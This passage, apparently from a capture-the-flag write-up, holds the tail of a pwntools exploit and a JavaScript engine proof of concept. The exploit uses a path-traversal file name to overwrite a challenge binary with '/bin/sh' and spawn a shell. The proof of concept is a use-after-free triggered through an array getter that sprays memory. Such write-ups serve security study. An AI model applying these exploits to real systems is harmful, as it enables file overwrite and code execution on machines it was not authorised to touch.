    sh.sendlineafter(b"input file idx: ", str(index).encode())
# os.system("rm ./temp/*")
input_dirname("/")
# debug("b *$rebase(0x1AA4)")
# name = b"/"*(0x30)
# Path traversal in the create-file feature (see the write-up): the file name
# escapes the working directory and targets the challenge binary's install
# path, and the text "/bin/sh" is written as its content.
name = b"../../../../../../../home/ctf/chall"
content = b"/bin/sh"
creat_file(name, content)
sh.interactive()
## babyjs
实现 uaf 的 poc,来自 @Tplus 师傅
// Use-after-free PoC: element 0 of `a` is turned into an accessor whose getter
// allocates a large spray array, and a.unique() is then called on `a`.
// NOTE(review): unique() is not a standard Array method — presumably a builtin
// added by the challenge; the getter presumably fires while it walks the array.
let a = [
    "A",
    "B",
    "C"
];
Object.defineProperty(a, 0, {
  configurable: true,
  get() {
    // console.log('getter(0) called on array "a"');
    // // a.length = 1;
    // // gc();
    // Allocate 500 entries into a global array from inside the getter.
    globalThis.spray = [];
    for (let i = 0; i < 500; i++) {
        spray.push("M");
    }
    // NOTE(review): an earlier comment said the getter returns the original
    // value "A", but the code returns "B".
    return "B";
  }
});
console.log("Calling a.unique()...");
let new_arr = a.unique();
console.log("a.unique() returned. new_arr is:", new_arr);
// Touch the returned array and the original element again after the call.
JSON.stringify(new_arr);
Math.min(a[0]);
console.log("Script finished (you likely won't see this).");